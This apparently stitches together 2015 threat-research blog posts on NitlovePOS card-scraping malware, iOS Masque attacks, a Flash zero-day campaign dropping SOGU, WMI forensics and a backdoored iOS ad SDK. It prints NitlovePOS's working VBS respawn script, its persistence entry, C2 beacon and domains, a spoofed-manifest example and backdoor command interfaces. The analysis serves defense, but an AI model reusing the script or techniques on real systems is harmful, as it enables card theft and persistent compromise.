When executed, it will copy itself to disk using a well-known hiding technique via NTFS Alternate Data Streams (ADS) as:

    ~\Local Settings\Temp:defrag.scr

It will then create a VBS script and save it to disk, again using ADS:

    ~\Local Settings\Temp:defrag.vbs

By doing this, the files are not visible in the file system and therefore are more difficult to locate and detect.

Once the malware is running, the “defrag.vbs” script monitors for attempts to delete the malicious process via InstanceDeletion Event; it will re-spawn the malware if the process is terminated. Here is the code contained within “defrag.vbs”:

Set f=CreateObject("Scripting.FileSystemObject")

Set W=CreateObject("WScript.Shell")

Do While GetObject("winmgmts:Win32_Process").Create(W.ExpandEnvironmentStrings("""%TMP%:Defrag.scr""     -"),n,n,p)=0

GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery("Select * From __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process' AND TargetInstance.ProcessID="&p).NextEvent

if(f.FileExists(WScript.ScriptFullName)=false)then

W.Run(W.ExpandEnvironmentStrings("cmd /C /D type nul > %TMP%:Defrag.scr")), 0, true

Exit Do

End If

Loop

The malware ensures that it will run after every reboot by adding itself to the Run registry key:

    \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\"Defrag" = wscript "C:\Users\ADMINI~1\AppData\Local\Temp:defrag.vbs"
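A quick way to check a host for this specific persistence artifact is to query the Run key for the “Defrag” value. A defensive Python sketch (Windows only, standard library; not FireEye tooling):

    import winreg

    KEY_PATH = r"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH) as key:
            value, _ = winreg.QueryValueEx(key, "Defrag")
            print("Suspicious Run entry found:", value)
    except FileNotFoundError:
        print("No 'Defrag' Run entry present")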

NitlovePOS expects to be run with the “-“ sign as argument; otherwise it won’t perform any malicious actions. This technique can help bypass some methods of detection, particularly those that leverage automation. Here is an example of how the malware is executed:

    \LOCALS~1\Temp:Defrag.scr" -

If the right argument is provided, NitlovePOS will decode itself in memory and start searching for payment card data. If it is not successful, NitlovePOS will sleep for five minutes and restart the searching effort.

NitlovePOS has three main threads:

    Thread 1:  SSL C2 Communications

    Thread 2: MailSlot monitoring waiting for CC.

    Thread 3: Memory Scrapping

Thread 1:  C2 Communications

NitlovePOS is configured to connect to one of three hardcoded C2 servers:

    systeminfou48[.]ru

    infofinaciale8h[.]ru

    helpdesk7r[.]ru

All three of these domains resolve to the same IP address: 146.185.221.31. This IP address is assigned to a network located in St. Petersburg, Russia.

As soon as NitlovePOS starts running on the compromised system, it will initiate a callback via SSL:

    POST /derpos/gateway.php HTTP/1.1

    User-Agent: nit_love<GUID>

    Host: systeminfou48.ru

    Content-Length: 41

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

 

    F.r.HWAWAWAWA

    <computer name>

    <OS Version>

    Y

The User-Agent header contains a hardcoded string “nit_love” and the Machine GUID, which is not necessarily unique but can be used as an identifier by the cybercriminals. The string “HWAWAWAWA” is hardcoded and may be a unique campaign identifier; the “F.r.” is calculated per infected host.

Thread 2: MailSlot monitoring waiting for payment card data

A mailslot is basically a shared range of memory that can be used to store data; the process creating the mailslot acts as the server and the clients can be other hosts on the same network, local processes on the machine, or local threads in the same process.

NitlovePOS uses this feature to store payment card information; the mailslot name that is created comes as a hardcoded string in the binary (once de-obfuscated);

    "\\.\mailslot\95d292040d8c4e31ac54a93ace198142"

Once the mailslot is created, an infinite loop will keep querying the allocated space.
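To make the mailslot pattern concrete, the following Python sketch (an illustration of the Win32 mailslot API via ctypes, not NitlovePOS code) creates a mailslot server with the name seen in the binary and blocks until a client writes a message to it.

    import ctypes
    from ctypes import wintypes

    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.CreateMailslotW.restype = wintypes.HANDLE

    NAME = r"\\.\mailslot\95d292040d8c4e31ac54a93ace198142"
    MAILSLOT_WAIT_FOREVER = 0xFFFFFFFF

    # Whoever creates the mailslot acts as the server and reads from it.
    raw_handle = kernel32.CreateMailslotW(NAME, 0, MAILSLOT_WAIT_FOREVER, None)
    if raw_handle in (None, wintypes.HANDLE(-1).value):
        raise ctypes.WinError(ctypes.get_last_error())
    hslot = wintypes.HANDLE(raw_handle)

    buf = ctypes.create_string_buffer(4096)
    read = wintypes.DWORD(0)
    # Blocks until a client (another thread or process) writes into the slot.
    if kernel32.ReadFile(hslot, buf, len(buf), ctypes.byref(read), None):
        print("mailslot message:", buf.raw[:read.value])
    kernel32.CloseHandle(hslot)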

Thread 3: Memory Scrapping

NitlovePOS scans running processes for payment data but will skip System and “System Idle Process.” It will try to match track 1 or track 2 data and, if found, will write the data into the mailslot created by Thread 2. This information is then sent via POST to the C2 using SSL, which makes network-level detection more difficult.
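For defenders, the same track formats can be searched for in process memory dumps. The patterns below are simplified approximations (our own, not taken from the malware) and will generate false positives; the test value uses a synthetic card number.

    import re

    # Rough approximations of ISO/IEC 7813 track 1 and track 2 layouts.
    TRACK1 = re.compile(rb"%B\d{13,19}\^[A-Z /.'-]{2,26}\^\d{7,}")
    TRACK2 = re.compile(rb";\d{13,19}=\d{7,}\?")

    def find_tracks(memory_dump):
        """Return all candidate track 1/track 2 strings in a memory dump."""
        return TRACK1.findall(memory_dump) + TRACK2.findall(memory_dump)

    sample = b";4111111111111111=25121010000012345678?"   # synthetic test value
    print(find_tracks(sample))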

Possible Control Panel

During our research we observed what appears to be a test control panel on a different, but probably related, server that matches with NitlovePOS. This panel is called “nitbot,” which is similar to the “nit_love” string found in the binary, and was located in a directory called “derpmo,” similar to the “derpos” directory used in this case.

 

The information contained in the NitlovePOS beacon matches the fields that are displayed in the Nitbot control panel. These include the machine’s GUID that is transmitted in the User-Agent header as well as the identifier “HWAWAWAWA,” which aligns with the “group name” that can be used by the cybercriminals to track various campaigns.

The control panel contains a view that lists the “tracks,” or stolen payment card data. This indicates that the panel is for malware capable of stealing data from POS machines, which matches the capability of the NitlovePOS malware.

Conclusion

Even cybercriminals engaged in indiscriminate spam operations have POS malware available and can deploy it to a subset of their victims. Due to the widespread use of POS malware, these tools are eventually discovered and detection increases. However, this is followed by the development of new POS malware with very similar functionality. Despite the similarity, the detection levels for new variants are initially quite low. This gives the cybercriminals a window of opportunity to exploit the use of a new variant.

We expect that new versions of functionally similar POS malware will continue to emerge to meet the demand of the cybercrime marketplace.

Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking

30 June 2015 at 14:00

In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container. In this blog, we also disclose the details of a previously fixed, but undisclosed, masque vulnerability: Plugin Masque, which bypasses iOS entitlement enforcement and hijacks VPN traffic. Our investigation also shows that around one third of iOS devices still have not updated to versions 8.1.3 or above, even 5 months after the release of 8.1.3, and these devices are still vulnerable to all the Masque Attacks.

We have disclosed five kinds of Masque Attacks, as shown in the following table.

Name / Consequences disclosed till now / Mitigation status

App Masque

* Replace an existing app
* Harvest sensitive data

Mitigation status: Fixed in iOS 8.1.3 [6]

URL Masque

* Bypass prompt of trust
* Hijack inter-app communication

Mitigation status: Partially fixed in iOS 8.1.3 [11]

Manifest Masque

* Demolish other apps (incl. Apple Watch, Health, Pay, etc.) during over-the-air installations

Mitigation status: Partially fixed in iOS 8.4

Plugin Masque

* Bypass prompt of trust
* Bypass VPN plugin entitlement
* Replace an existing VPN plugin
* Hijack device traffic
* Prevent device from rebooting
* Exploit more kernel vulnerabilities

Mitigation status: Fixed in iOS 8.1.3

Extension Masque

* Access another app’s data
* Or prevent another app from accessing its own data

Mitigation status: Partially fixed in iOS 8.4

Manifest Masque Attack leverages the CVE-2015-3722/3725 vulnerability to demolish an existing app on iOS when a victim installs an in-house iOS app wirelessly using enterprise provisioning from a website. The demolished app (the attack target) can be either a regular app downloaded from official App Store or even an important system app, such as Apple Watch, Apple Pay, App Store, Safari, Settings, etc. This vulnerability affects all iOS 7.x and iOS 8.x versions prior to iOS 8.4. We first notified Apple of this vulnerability in August 2014.

Extension Masque Attack can break the restrictions of app data container. A malicious app extension installed along with an in-house app on iOS 8 can either gain full access to a targeted app’s data container or prevent the targeted app from accessing its own data container. On June 14, security researchers Luyi, Xiaofeng et al. disclosed several severe issues on OS X, including a similar issue with this one [5]. They did remarkable research, but happened to miss this on iOS. Their report claimed: “this security risk is not present on iOS”. However, the data container issue does affect all iOS 8.x versions prior to iOS 8.4, and can be leveraged by an attacker to steal all data in a target app’s data container. We independently discovered this vulnerability on iOS and notified Apple before the report [5] was published, and Apple fixed this issue as part of CVE-2015-3725.

In addition to these two vulnerabilities patched on iOS 8.4, we also disclose the detail of another untrusted code injection attack by replacing the VPN Plugin, the Plugin Masque Attack. We reported this vulnerability to Apple in Nov 2014, and Apple fixed the vulnerability on iOS 8.1.3 when Apple patched the original Masque Attack (App Masque) [6, 11]. However, this exploit is even more severe than the original Masque Attack. The malicious code can be injected to the neagent process and can perform privileged operations, such as monitoring all VPN traffic, without the user’s awareness. We first demonstrated this attack in the Jailbreak Security Summit [7] in April 2015. Here we categorize this attack as Plugin Masque Attack.

We will discuss the technical details and demonstrate these three kinds of Masque Attacks.

Manifest Masque: Putting On the New, Taking Off the Old

To distribute an in-house iOS app with enterprise provisioning wirelessly, one has to publish a web page containing a hyperlink that redirects to an XML manifest file hosted on an https server [1]. The XML manifest file contains metadata of the in-house app, including its bundle identifier, bundle version and the download URL of the .ipa file, as shown in Table 1. When installing the in-house iOS app wirelessly, iOS downloads this manifest file first and parses the metadata for the installation process.

<a href="itms-services://?action=downloadmanifest&url=https://example.com/manifest.plist">Install App</a>

 

<plist>

      <array>

          <dict>

             ...

             <key>url</key>

             <string>https://XXXXX.com/another_browser.ipa</string>

            ...

             <key>bundle-identifier</key>

             <string>com.google.chrome.ios</string>

             …

             <key>bundle-version</key>

             <string>1000.0</string>

           </dict>

           <dict>

              … Entries For Another App

           </dict>

       <array>

</plist>

Table 1. An example of the hyperlink and the manifest file

According to Apple’s official document [1], the bundle-identifier field should be “Your app’s bundle identifier, exactly as specified in your Xcode project”. However, we have discovered that iOS doesn’t verify the consistency between the bundle identifier in the XML manifest file on the website and the bundle identifier within the app itself. If the XML manifest file on the website has a bundle identifier equivalent to that of another genuine app on the device, and the bundle-version in the manifest is higher than the genuine app’s version, the genuine app will be demolished down to a dummy placeholder, whereas the in-house app will still be installed using its built-in bundle id. The dummy placeholder will disappear after the victim restarts the device. Also, as shown in Table 1, a manifest file can contain different apps’ metadata entries to distribute multiple apps at a time, which means this vulnerability can cause multiple apps to be demolished with just one click by the victim.
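The missing check is easy to express. The sketch below (our illustration, with placeholder file names, and assuming a manifest shaped like Table 1) compares the bundle-identifier entries declared in the manifest against the CFBundleIdentifier inside the .ipa's Info.plist.

    import plistlib
    import zipfile

    def manifest_bundle_ids(manifest_path):
        """Collect bundle-identifier values from a manifest shaped like Table 1."""
        with open(manifest_path, "rb") as fh:
            entries = plistlib.load(fh)              # top-level <array> of <dict>s
        return [entry.get("bundle-identifier") for entry in entries]

    def ipa_bundle_id(ipa_path):
        """Read CFBundleIdentifier from the app bundle inside an .ipa archive."""
        with zipfile.ZipFile(ipa_path) as ipa:
            info_name = next(name for name in ipa.namelist()
                             if name.endswith(".app/Info.plist") and name.count("/") == 2)
            return plistlib.loads(ipa.read(info_name))["CFBundleIdentifier"]

    declared = manifest_bundle_ids("manifest.plist")
    actual = ipa_bundle_id("app.ipa")
    if actual in declared:
        print("manifest and app bundle identifiers are consistent")
    else:
        print("MISMATCH: manifest declares", declared, "but the app is", actual)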

By leveraging this vulnerability, one app developer can install his/her own app and demolish other apps (e.g. a competitor’s app) at the same time. In this way, attackers can perform DoS attacks or phishing attacks on iOS.

Figure 1. Phishing Attack by installing “malicious Chrome” and demolishing the genuine one

Figure 1 shows an example of the phishing attack. When the user clicks a URL in the Gmail app, this URL is rewritten with the “googlechrome-x-callback://” scheme and is supposed to be handled by Chrome on the device. However, an attacker can leverage the Manifest Masque vulnerability to demolish the genuine Chrome and install “malicious Chrome” registering the same scheme. Unlike the original Masque Attack [xx], which requires the same bundle identifier to replace a genuine app, the malicious Chrome in this phishing attack uses a different bundle identifier to bypass the installer’s bundle identifier validation. Later, when the victim clicks a URL in the Gmail app, the malicious Chrome can take over the rewritten URL scheme and perform more sophisticated attacks.

What’s worse, an attacker can also exploit this vulnerability to demolish all system apps (e.g. Apple Watch, Apple Pay UIService, App Store, Safari, Health, InCallService, Settings, etc.). Once demolished, these system apps will no longer be available to the victim, even if the victim restarts the device.

Here we demonstrate this DoS attack on iOS 8.3 to demolish all the system apps and one App Store app (i.e. Gmail) when the victim clicks only once to install an in-house app wirelessly. Note that after rebooting the device, all the system apps still remain demolished while the App Store app would disappear since it has already been uninstalled.

Second Adobe Flash Zero-Day CVE-2015-5122 from HackingTeam Exploited in Strategic Web Compromise Targeting Japanese Victims

On July 14, FireEye researchers discovered attacks exploiting the Adobe Flash vulnerability CVE-2015-5122, just four days after Adobe released a patch. CVE-2015-5122 was the second Adobe Flash zero-day revealed in the leak of HackingTeam’s internal data. The campaign targeted Japanese organizations by using at least two legitimate Japanese websites to host a strategic web compromise (SWC), where victims ultimately downloaded a variant of the SOGU malware.

Strategic Web Compromise

At least two different Japanese websites were compromised to host the exploit framework and malicious downloads:

  • Japan’s International Hospitality and Conference Service Association (IHCSA) website (hxxp://www.ihcsa[.]or[.]jp) in Figure 1

    Figure 1: IHCSA website

  • Japan’s Cosmetech Inc. website (hxxp://cosmetech[.]co[.]jp)

The main landing page for the attacks is a specific URL seeded on the IHCSA website (hxxp://www.ihcsa[.]or[.]jp/zaigaikoukan/zaigaikoukansencho-1/), where users are redirected to the HackingTeam Adobe Flash framework hosted on the second compromised Japanese website. In the past week, we observed this same basic framework across several different SWCs exploiting the “older” CVE-2015-5119 Adobe Flash vulnerability, as shown in Figure 2.

    Figure 2: First portion of exploit chain

The webpage (hxxp://cosmetech[.]co[.]jp/css/movie.html) is built with the open source framework Adobe Flex and checks if the user has at least Adobe Flash Player version 11.4.0 installed. If the victim has the correct version of Flash, the user is directed to run a different, more in-depth profiling script (hxxp://cosmetech.co.jp/css/swfobject.js), which checks for several more conditions in addition to their version of Flash. If the conditions are not met then the script will not attempt to load the Adobe Flash (SWF) file into the user’s browser. In at least two of the incidents we observed, the victims were running Internet Explorer 11 on Windows 7 machines.

The final component is delivering a malicious SWF file, which we confirmed exploits CVE-2015-5122 on Adobe Flash Player 18.0.0.203 for Windows, as shown in Figure 3.

    Figure 3: Malicious SWF download

SOGU Malware, Possible New Variant

After successful exploitation, the SWF file dropped a SOGU variant—a backdoor widely used by Chinese threat groups and also known as “Kaba”—in a temporary directory under “AppData\Local\”. The dropped binary has the properties and configuration shown in Figure 4.

    Filename: Rdws.exe

    Size: 413696 bytes

    MD5: 5a22e5aee4da2fe363b77f1351265a00

    Compile Time: 2015-07-13 08:11:01

    SHA256: df5f1b802d553cddd3b99d1901a87d0d1f42431b366cfb0ed25f465285e38d27

    SSDeep:6144:Na/PSOE9OPXCQpA3abFUntBrDP3FVPsCE2NiYfFei78GlGeYO:IPSOE9OPXCQ
    pAK5YBvPPPrZVkiY2Y

    Import Hash: ae984e4ab41d192d631d4f923d9210e4

    PEHash: 57e6b26eac0f34714252957d26287bc93ef07db2

    .text: e683e1f9fb674f97cf4420d15dc09a2b

    .rdata: 3a92b98a74d7ffb095fe70cf8acacc75

    .data: b5d4f68badfd6e3454f8ad29da54481f

    .rsrc: 474f9723420a3f2d0512b99932a50ca7

    C2 Password: gogogod<

    Memo: 201507122359

    Process Inject Targets: %windir%\system32\svchost.exe

    Sogu Config Encoder: sogu_20140307

    Mutex Name: ZucFCoeHa8KvZcj1FO838HN&*wz4xSdmm1

    Figure 4: SOGU Binary ‘Rdws.exe’

The compile timestamp indicates the malware was assembled on July 13, less than a day before we observed the SWC. We believe the timestamp in this case is likely genuine, based on the timeline of the incident. The SOGU binary also appears to masquerade as a legitimate Trend Micro file named “VizorHtmlDialog.exe”, as shown in Figure 5.

    LegalCopyright: Copyright (C) 2009-2010 Trend Micro Incorporated. All rights reserved.

    InternalName: VizorHtmlDialog

    FileVersion: 3.0.0.1303

    CompanyName: Trend Micro Inc.

    PrivateBuild: Build 1303 - 8/8/2010

    LegalTrademarks: Trend Micro Titanium is a registered trademark of Trend Micro Incorporated.

    Comments:

    ProductName: Trend Micro Titanium

    SpecialBuild: 1303

    ProductVersion: 3.0

    FileDescription: Trend Titanium

    OriginalFilename: VizorHtmlDialog.exe

    Figure 5: Rdws.exe version information

The threat group likely used Trend Micro, a security software company headquartered in Japan, as the basis for the fake file version information deliberately, given the focus of this campaign on Japanese organizations.

SOGU Command and Control

The SOGU variant calls out to a previously unobserved command and control (CnC) domain, “amxil[.]opmuert[.]org”, over port 443, as shown in Figure 6. It uses modified DNS TXT record beaconing with an encoding we have not previously observed with SOGU malware, along with a non-standard header, indicating that this is possibly a new variant.

    Figure 6: SOGU C2 beaconing

The WHOIS registrant email address for the domain did not indicate any prior malicious activity, and the current IP resolution (54.169.89.240) is for an Amazon Web Services IP address.
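Defenders can check what the CnC domain currently resolves to and whether it serves TXT records. A short sketch assuming the dnspython package (it queries a live attacker domain, so run it only from infrastructure you are comfortable exposing):

    import dns.resolver

    DOMAIN = "amxil.opmuert.org"

    for rtype in ("A", "TXT"):
        try:
            for record in dns.resolver.resolve(DOMAIN, rtype):
                print(rtype, record.to_text())
        except Exception as exc:   # NXDOMAIN, no answer, timeout, etc.
            print(rtype, "lookup failed:", exc)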

Another Quick Turnaround on Leveraging HackingTeam Zero-Days

Similar to the short turnaround time highlighted in our blog on the recent APT3/APT18 phishing attacks, the threat actor quickly incorporated the leaked zero-day vulnerability into an SWC campaign. The threat group appears to have used procured and compromised infrastructure to target Japanese organizations. Within two days we observed at least two victims related to this attack.

We cannot confirm how the organizations were targeted, though similar incidents involving SWC and exploitation of the Flash vulnerability CVE-2015-5119 lured victims with phishing emails. Additionally, the limited popularity of the niche site also contributes to our suspicion that phishing emails may have been the lure, and not incidental web browsing.

Malware Overlap with Other Chinese Threat Groups

We believe that this is a concerted campaign against Japanese companies given the nature of the SWC. The use of SOGU malware and the dissemination method are consistent with the tactics of Chinese APT groups that we track. Chinese APT groups have previously targeted the affected Japanese organizations, but we have yet to confirm which group is responsible for this campaign.

Why Japan?

In this case, we do not have enough information to discern specifically what the threat actors may have been pursuing. The Japanese economy’s technological innovation and strengths in high-tech and precision goods have attracted the interest of multiple Chinese APT groups, who almost certainly view Japanese companies as a rich source of intellectual property and competitive intelligence. The Japanese government and military organizations are also frequent targets of cyber espionage.[1]  Japan’s economic influence, alliance with the United States, regional disputes, and evolving defense policies make the Japanese government a dedicated target of foreign intelligence.

Recommendations

FireEye maintains endpoint and network detection for CVE-2015-5122 and the backdoor used in this campaign. FireEye products and services identify this activity as SOGU/Kaba within the user interface. Additionally, we highly recommend:

  • Applying Adobe’s newest patch for Flash immediately;
  • Querying for additional activity involving the indicators from the compromised Japanese websites and the SOGU malware callbacks;
  • Blocking outbound communications to the CnC addresses; and
  • Scoping the environment to prepare for incident response.

     

    [1] Humber, Yuriy and Gearoid Reidy. “Yahoo Hacks Highlight Cyber Flaws Japan Rushing to Thwart.” Bloomberg Business. 8 July 2014. http://www.bloomberg.com/news/articles/2014-07-08/yahoo-hacks-highlight-cyber-flaws-japan-rushing-to-thwart

    Japanese Ministry of Defense. “Trends Concerning Cyber Space.” Defense of Japan 2014.  http://www.mod.go.jp/e/publ/w_paper/pdf/2014/DOJ2014_1-2-5_web_1031.pdf

    LAC Corporation. “Cyber Grid View, Vol. 1.” http://www.lac.co.jp/security/report/pdf/apt_report_vol1_en.pdf

    Otake, Tomoko. “Japan Pension Service hack used classic attack method.” Japan Times. 2 June 2015. http://www.japantimes.co.jp/news/2015/06/02/national/social-issues/japan-pension-service-hack-used-classic-attack-method/

     

Windows Management Instrumentation (WMI) Offense, Defense, and Forensics

8 August 2015 at 18:45

Windows Management Instrumentation (WMI) is a remote management framework that enables the collection of host information and the execution of code, and provides an eventing system that can respond to operating system events in real time. FireEye has recently seen a surge in attacker use of WMI to carry out objectives such as system reconnaissance, remote code execution, persistence, lateral movement, covert data storage, and VM detection. Defenders and forensic analysts have largely remained unaware of the value of WMI due to its relative obscurity and its completely undocumented repository file format. After extensive reverse engineering, the FireEye FLARE team has documented the WMI repository file format in detail, developed libraries to parse it, and formed a methodology for finding evil in the repository.
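To illustrate the kind of repository and eventing artifacts defenders can hunt for, here is a minimal Python sketch (assuming a Windows host with the pywin32 package installed and sufficient privileges; the namespace and class names are standard WMI, everything else is illustrative) that enumerates permanent WMI event subscriptions, a persistence mechanism frequently abused by attackers:

    # A minimal sketch: list permanent WMI event subscription bindings,
    # which tie an event filter (the trigger) to an event consumer (the
    # action, e.g. a command line or script).
    import win32com.client

    # Connect to the root\subscription namespace, where permanent event
    # filters, consumers, and bindings are stored.
    svc = win32com.client.GetObject(r"winmgmts:\\.\root\subscription")

    for binding in svc.ExecQuery("SELECT * FROM __FilterToConsumerBinding"):
        print("Filter:  ", binding.Filter)
        print("Consumer:", binding.Consumer)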

The FLARE team is now publishing a whitepaper that takes a deep dive into the architecture of WMI, reveals case studies in attacker use of WMI in the wild, describes WMI attack mitigation strategies, and shows how to mine its repository for forensic artifacts. The document also demonstrates how to detect attacker activity in real-time by tapping into the WMI eventing system. WMI is a valuable asset not just for system administrators and attackers, but equally so for defenders and forensic analysts. Download a copy of the whitepaper today!

2015 FLARE-ON Challenge Solutions

8 September 2015 at 14:56

The first few challenges narrowed the playing field drastically, with most serious contestants holding firm through challenges 4-9. The last two raised the difficulty considerably, making for a demanding final stretch and a well-earned finish line.

The FLARE On Challenge always reaches a very wide international audience. Outside of the USA, this year’s country with the most finishers was China, with an impressive 11 winners. I hope that massive shipment of belt buckles doesn’t get caught up in customs! The performance of contestants from Vietnam and Slovakia was also particularly commendable, as both countries held early leads in total finishers. Based on the locations we are sending the challenge prizes to (people who responded with their shipping info by noon today), we can say that 33 countries had finishers this year. The next graph shows the total winners by country this year.

And without further ado, here are the solutions for this year’s challenges, each written by their respective challenge creator.

1.     CLICK HERE FOR SOLUTION #1  

2.     CLICK HERE FOR SOLUTION #2  

3.     CLICK HERE FOR SOLUTION #3  

4.     CLICK HERE FOR SOLUTION #4  

5.     CLICK HERE FOR SOLUTION #5  

6.     CLICK HERE FOR SOLUTION #6  

7.     CLICK HERE FOR SOLUTION #7  

8.     CLICK HERE FOR SOLUTION #8  

9.     CLICK HERE FOR SOLUTION #9  

10.   CLICK HERE FOR SOLUTION #10  

11.   CLICK HERE FOR SOLUTION #11  

We hope you had fun and learned something new about reverse engineering! Stay tuned for the third FLARE On Challenge coming in 2016!

iBackDoor: High-risk Code Sneaks into the App Store

26 October 2015 at 13:51

The affected ad library embeds backdoors in unsuspecting apps that use it to display ads, exposing sensitive data and functionality. The backdoors can be controlled remotely by loading JavaScript code from remote servers to perform the following actions:

  • Capture audio and screenshots.
  • Monitor and upload device location.
  • Read/delete/create/modify files in the app’s data container.
  • Read/Write/Reset the app’s keychain (e.g., app password storage).
  • Post encrypted data to remote servers.
  • Open URL schemes to identify and launch other apps installed on the device.
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button.

The offending ad library contains identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the backdoored ad library, with version codes between 5.3.3 and 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2], identified as version 7.0.5, the backdoors are not present. We cannot determine with certainty whether the backdoored versions of the library were actually released by adSage, or whether they were created and/or compromised by a third party.

As of publication of this blog, we have identified 2,846 apps published in the App Store containing backdoored versions of the mobiSage SDK. Among these 2,846 apps, we have observed over 900 attempts to contact their command and control (C2) server. We have notified Apple and provided the details to them.

These backdoors can be controlled not only by the original creators of the ad library, but potentially also by outside threat actors. While we have not observed commands from the C2 server intended to trigger the most sensitive capabilities, such as recording audio or stealing sensitive data, there are several ways that the backdoors could be abused by third-party attackers conducting targeted attacks to further compromise the security and privacy of the device and user:

  • An attacker could reverse-engineer the insecure HTTP-based control protocol between the ad library and its server, and then hijack the connection to insert commands to trigger the backdoors and steal sensitive information.
  • A malicious app developer can similarly inject commands, utilizing the library’s backdoors to build their own surveillance app. Since the ad library has passed the App Store review process in numerous apps, this is an attractive way to create an app with these hidden behaviors that will pass under Apple’s radar.

App Store Protections Ineffective

Despite Apple’s reputation for keeping malware out of the App Store with its strict review process, this case demonstrates that it is still possible for dangerous code that exposes users to critical security and privacy risks to sneak into the App Store by piggybacking on unsuspecting apps. Backdoors that enable silently recording audio and uploading sensitive data when triggered by downloaded code clearly violate the requirements of the iOS Developer Program [3]. The requirements state that apps are not permitted to download code or scripts, with the exception of scripts that “do not change the primary purpose of the Application by providing features or functionality that are inconsistent with the intended and advertised purpose of the Application as submitted to the App Store.” And, for apps that can record audio, “a reasonably conspicuous audio, visual or other indicator must be displayed to the user as part of the Application to indicate that a Recording is taking place.”  The backdoored versions of mobiSage clearly violate these requirements, yet thousands of affected apps made it past the App Store review process.

Technical Details

As shown in Figure 1, the backdoored mobiSage library includes two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

 

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then, we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format  adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

 

 

Figure 2: Communication via URL loading in WebView.
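As an analyst-side illustration (written in Python rather than the library’s own Objective-C, and assuming parameters are simply “&”-delimited as the format above suggests), a command URL of this form can be split into a command name and parameter list like so:

    # A minimal sketch: split an adsagejs://cmd&parameter URL into its
    # command and parameters. The example command is hypothetical.
    from urllib.parse import urlparse, unquote

    def parse_adsage_url(url):
        parsed = urlparse(url)
        if parsed.scheme != "adsagejs":
            return None
        fields = [unquote(f) for f in (parsed.netloc + parsed.path).split("&")]
        return fields[0], fields[1:]

    print(parse_adsage_url("adsagejs://captureAudio&10&40"))
    # -> ('captureAudio', ['10', '40'])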

To process a command in its queue, msageCore dispatches the command along with its parameters to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

 

 

Figure 3: Command dispatch in msageCore.

High-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name | Interfaces

MSageCoreUIManagerPlugin | - captureAudio:  - captureImage:  - openMail:  - openSMS:  - openApp:  - openInAppStore:  - openCamera:  - openImagePicker:  - ...

MSageCoreLocation | - start:  - stop:  - setTimer:  - returnLocationInfo:webViewId:  - ...

MSageCorePluginFileModule | - createDir  - deleteDir:  - deleteFile:  - createFile:  - getFileContent:  - ...

MSageCoreKeyChain | - writeKeyValue:  - readValueByKey:  - resetValueByKey:

MSageCorePluginNetWork | - sendHttpGet:  - sendHttpPost:  - sendHttpUpload:  - ...

MSageCoreEncryptPlugin | - MD5Encrypt:  - SHA1Encrypt:  - AESEncrypt:  - AESDecrypt:  - DESEncrypt:  - DESDecrypt:  - XOREncrypt:  - XORDecrypt:  - RC4Encrypt:  - RC4Decrypt  - ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the backdoors in the library. They expose the ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

 

Beyond the selected interfaces, the ad library exposes users to additional risks by including explicit logic to promote and install “enpublic” apps shown in Figure 4. As we have highlighted in previous blogs [4, 5, 6, 7, 8], enpublic apps can introduce additional security risks by using private APIs, which would normally cause an app to be blocked by the App Store review process. In previous blogs we have described a number of “Masque” attacks utilizing enpublic apps [5, 6, 7], which affect pre-iOS 9 devices. The attacks include background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations.

 

 

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

 

We can observe the functionality of the ad library by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

 

 

Figure 5: Capturing audio with duration and threshold.

 

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

 

 

Figure 6: Reading the keychain in the kSecClassGenericPassword class.

Remote control in msageJS

msageJS contains JavaScript code for communicating with a C2 server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

 

 

Figure 7: The file layout of msageJS

 

The command execution interface is constructed as follows:

 

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

 

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

 

